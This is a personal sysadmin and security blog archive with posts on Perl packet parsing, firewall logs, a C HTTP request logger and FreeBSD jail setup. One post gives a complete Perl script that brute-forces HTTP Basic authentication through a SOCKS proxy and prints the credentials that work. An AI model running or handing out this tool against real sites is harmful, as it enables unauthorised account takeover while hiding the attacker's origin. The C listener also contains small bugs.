Thursday, April 22, 2010

Converting IP Options from binary to hex in Perl

A quick one liner to convert TCP Options from binary to Hex.

my $tcp_obj = NetPacket::TCP->decode($ip_obj->{data});
my $tcp_options = sprintf("%08X",unpack("N",$tcp_obj->{options})).
Posted by at No comments:
Labels:

Tuesday, November 10, 2009

UDP Port 3437

I have been seeing traffic like this on my firewall more and more. Does anyone know what it is?

99. 101103 rule 19/0(match): block in on le0: 4.234.24.139.34247 > 192.168.100.7.3437: UDP, length 31
44. 809854 rule 19/0(match): block in on le0: 24.197.158.193.36787 > 192.168.100.7.3437: UDP, length 35
19. 922285 rule 19/0(match): block in on le0: 219.58.194.9.6346 > 192.168.100.7.3437: UDP, length 31
603. 012552 rule 19/0(match): block in on le0: 75.83.84.151.24363 > 192.168.100.7.3437: UDP, length 31
509. 641906 rule 19/0(match): block in on le0: 124.184.98.120.25705 > 192.168.100.7.3437: UDP, length 35
Posted by at No comments:

Tuesday, November 3, 2009

Listen for http connections with C 


#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <signal.h>
#include  <arpa/inet.h>
#include <time.h>

#define PORT 30000
#define MAXBUFF 1024

int wwwsock;

void myError(char *err) {
    perror(err);
    exit(1);
}

void catchSig(int sig) {
  close(wwwsock);
 exit(0);
}

int main(int argc, char *argv[]) {
 char timebuff[250];

 char *buffer;
 char *req;
 int clientAddr, newConnection, size;
 int optval=1;

 time_t curtime;
 struct sockaddr_in serv_addr, cli_addr;
 
  (void)signal(SIGINT, catchSig);
 wwwsock = socket(AF_INET, SOCK_STREAM, 0);

 
 if(wwwsock<0) 
  myError("Socket Failed\n");
 

 memset(&serv_addr,'\0',sizeof(serv_addr));
 serv_addr.sin_family = AF_INET;
 serv_addr.sin_addr.s_addr = INADDR_ANY;
 serv_addr.sin_port = htons(PORT);

 setsockopt(wwwsock, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval);
 
 if (bind(wwwsock,(struct sockaddr *) &serv_addr,sizeof(serv_addr)) < 0) {

  char error[30];
  sprintf(error,"ERROR binding to port %d",PORT);
  myError(error);
 }

 
 listen(wwwsock,5);
 clientAddr=sizeof(struct sockaddr_in);
 buffer=malloc(MAXBUFF); 

 req=malloc(MAXBUFF);
 while(1) {
  newConnection=accept(wwwsock,(struct sockaddr *) &cli_addr,(socklen_t *)&clientAddr);

  memset(buffer,'\0',sizeof(buffer));
  
  if(recv(newConnection,buffer,MAXBUFF,0) > 0) {

  
   if(strstr(buffer,"\n")) {
    size=(strlen(buffer)-strlen(strstr(buffer,"\n")));

   }
   else
    size=0;
   
   if(size>0 && size<MAXBUFF) {

    curtime=time(NULL);
    strftime(timebuff,sizeof(timebuff),"%c",localtime (&curtime));
    strncpy(req,buffer,size+1);
    printf("%s Client %s Requested %s",timebuff,inet_ntoa(cli_addr.sin_addr),req);

   }
   
   send(newConnection,"HTTP/1.1 404 Not Found\r\nConnection: close\r\n\r\n",22,0);

   close(newConnection);
  }
 } 
 close(wwwsock);
 return 0; 

}
Posted by at No comments:

Sunday, February 15, 2009

Using Ports within a jail

To cut down on hard drive space use it's a good idea to use the ports directory from the main system in each jail. To secure it the best idea is to mount /usr/ports read only. The problem with having /usr/ports read only is the source can not be saved in /usr/ports/distfiles. To fix this we need to tell make to save the files elsewhere.

First edit /etc/fstab and add
/usr/ports/PATH_TO_JAIL     /usr/ports     nullfs     ro     0     0

After remount file systems
mount -a

From within the jail create the dir /var/distfile and add
DISTDIR=/var/distfile and WRKDIRPREFIX=/var/distfiles to /etc/make.conf

All the files shoud besave in /var/distfile from now on.
Posted by at No comments:
Labels:

Sunday, October 14, 2007

HTTP Basic auth brute forcer that connects via a socks proxy

socks.pl is a perl script that connects to a socks proxy and try's every user and password in the file given against a protected web directory.

Modules needed IO::Socket::Socks, MIME::Base64 and Getopt::Std

Usage:
perl socks.pl -s SOCKS_PROXY -d WEB_DIR -f USER_FILE -i WEB_SERVER -p PROXY_PORT -P WEB_SERVER_PORT

USER_FILE Format:
User:Pass

References:
RFC1945

use IO::Socket::Socks;
use MIME::Base64;
use Getopt::Std;
use strict;

sub setOpts {

    my $optString='s:p:f:d:i:P:';
    my %opt;

    my %configHash;

    if($#ARGV >=11) {
        getopts($optString,\%opt) or printError("Error on use $0 -s Proxy Server -d Protected File  -f User and Password File -p proxyport -i Web Server IP -P Web Server Port");
        $configHash{'PServer'}=$opt{'s'} if(defined($opt{'s'}));
        $configHash{'PPort'}=$opt{'p'} if(defined($opt{'p'}));
        $configHash{'SIP'}=$opt{'i'} if(defined($opt{'i'}));
        $configHash{'SPort'}=$opt{'P'} if(defined($opt{'P'}));
        $configHash{'Sdir'}=$opt{'d'} if(defined($opt{'d'}));
        $configHash{'IDfile'}=$opt{'f'} if(defined($opt{'f'}));

    }
    else {
        printError("Error on use $0 -s Proxy Server -d Protected File  -f User and Password File -p proxyport -i Web Server IP -P Web Server Port");

    }
    return %configHash;
}

sub connectProxy {

    my %configHash=@_;
    $configHash{'sock'} = new IO::Socket::Socks(ProxyAddr=>$configHash{'PServer'}, 
                                                ProxyPort=>$configHash{'PPort'}, 
                                                ConnectAddr=>$configHash{'SIP'},
                                                ConnectPort=>$configHash{'SPort'}) or die($!);
    return %configHash;

}

sub printError {
 my $errorMsg=$_[0];

 print STDERR $errorMsg."\n";
 exit();
}

sub checkFile {
 my $fileName=$_[0];
 printError("Please check file $fileName") if (! -f $fileName);

}

sub loadFile { my %configHash=@_;
 open(USER,'<',$configHash{'IDfile'}) or printError("$! on file $configHash{'IDfile'}");

}


sub convUserPass{
    my %configHash=@_;

    $configHash{'encUserPass'}=encode_base64($configHash{'userInfo'});

    return %configHash;

}

sub logIN {
    my %configHash=@_;

    while(<USER>) {
        %configHash=connectProxy(%configHash);
        $configHash{'userInfo'}=$_;

        chomp($configHash{'userInfo'});
        %configHash=convUserPass(%configHash);

        my $socks=$configHash{'sock'};

        print $socks "GET ".$configHash{'Sdir'}." HTTP/1.0\nHost: localhost\nAuthorization: Basic ".$configHash{'encUserPass'}."\n\n";

        my $rsp;
        $socks->read($rsp,15);

        print $configHash{'userInfo'}."\n" if($rsp eq 'HTTP/1.1 200 OK');

    }
}

sub closeProxy {
    my %configHash=@_;

    %configHash=connectProxy(%configHash)->close();
}

sub init {

    my %configHash=setOpts();

    checkFile($configHash{'IDfile'});
    loadFile(%configHash);

    logIN(%configHash);

}
init();
Posted by at No comments:
Labels:

Saturday, October 13, 2007

FreeBSD jails the easy way

Jails are a nice easy way to isolate processes in FreeBSD. A jail makes it possible to run services in a virtual system keeping them from interacting with the host system. More in depth information can be found here .

Most if not all of the tutorials I have found have you recompile the system into a new directory like the section6 wiki. This just seems overly complicated and hard to do especially if you are in a pinch for time. Getting ready for a security competition my partner Sean Jordan introduced me to the sysinstall method of making jails.

When making partitions I like to create a /jail partition to give the jails their own partition. I suggest making it at least 2 gigs for each jail. Also remember all the files used by the users / services in the jail need to be on that partition so size it accordingly. Each jail needs it's own ip address, for my set up I am behind a router running nat using the subnet 172.16.67.0/24.

Once FreeBSD is installed start making the needed directories.

  1. mkdir /jail/master
  2. mkdir /jail/master/usr/
  3. cp -R /bin/ /jail/master/bin
  4. cp -R /etc/ /jail/master/etc
  5. cp -R /lib/ /jail/master/lib
  6. cp -R /libexec/ /jail/master/libexec
  7. cp -R /sbin/ /jail/master/sbin
  8. cp -R /usr/share /jail/master/usr/share
  9. cp -R /usr/bin /jail/master/usr/bin
  10. cp -R /usr/sbin /jail/master/usr/sbin
  11. cp -R /usr/lib /jail/master/usr/lib
Once you have all the need directories chroot your self into /jail/master and run sysinstall
  1. chroot /jail/master /bin/csh
  2. /usr/sbin/sysinstall
Once you are in choose
  1. Configure
  2. Distributions
  3. base
  4. (use ftp for media source)
  5. exit sysinstall
When you have the whole base distributions exit the chroot
  1. exit
For demonstration purposes I'll create 2 jails ssh and dns
  1. cp -R /jail/master/ /jail/ssh
  2. cp -R /jail/master/ /jail/dns
After the directories are made edit /etc/rc.conf
  1. vi /etc/rc.conf
Add the following lines

  1. ifconfig_lnc0_alias0="172.16.67.47 netmask 255.255.255.0" #Add alias for your network
  2. ifconfig_lnc0_alias1="172.16.67.48 netmask 255.255.255.0" #Add alias for your network
  3. jail_enable="YES" # Set to NO to disable starting of any jails
  4. jail_list="ssh dns" # Space separated list of names of jails
  5. jail_set_hostname_allow="NO" # Allow root user in a jail to change its hostname
  6. jail_socket_unixiproute_only="YES" # Route only TCP/IP within a jail
  7. jail_ssh_rootdir="/jail/ssh"
  8. jail_ssh_hostname="ssh.bsd.local"
  9. jail_ssh_ip="172.16.67.47"
  10. jail_ssh_exec_start="/bin/sh /etc/rc"
  11. jail_ssh_devfs_enable="YES"
  12. jail_ssh_devfs_ruleset="devfsrules_jail"
  13. jail_dns_rootdir="/jail/dns"
  14. jail_dns_hostname="dns.bsd.local"
  15. jail_dns_ip="172.16.67.48"
  16. jail_dns_exec_start="/bin/sh /etc/rc"
  17. jail_dns_devfs_enable="YES"
  18. jail_dns_devfs_ruleset="devfsrules_jail"
Once the file is saved start the jails and setup the nic
  1. sh /etc/rc
Check to see that the jails are running by using jls
  • JID IP Address Hostname Path
  • 2 172.16.67.48 dns.bsd.local /jail/dns
  • 1 172.16.67.47 ssh.bsd.local /jail/ssh
Check to see if the interface is listening on the correct ip address by running ifconfig

  • lnc0: flags=108843 mtu 1500
  • inet6 fe80::20c:29ff:fe3c:1ce8%lnc0 prefixlen 64 scopeid 0x1
  • inet 172.16.67.46 netmask 0xffffff00 broadcast 172.16.67.255
  • inet172.16.67.47 netmask 0xffffff00 broadcast 172.16.67.255
  • inet 172.16.67.48 netmask 0xffffff00 broadcast 172.16.67.255

To enter a jail use jexec
  1. jexec 1 /usr/local/bin/bash
Stopping jails can be done in two ways /etc/rc.d/jail or pkill.
To stop all running jails run
  1. /etc/rc.d/jail stop
To stop just 1 jail run
  1. pkill -j JID
Once you are in the jail you can do what ever you would do on a normal system. If you want to use icmp within the set security.jail.allow_raw_sockets to 1 in /etc/sysctl.conf
  1. security.jail.allow_raw_sockets=1
On a final note there are no users within the jail yet and the root user has no password so be sure to set one using the passwd command.
Posted by at 2 comments:
Labels:
Subscribe to: Posts (Atom)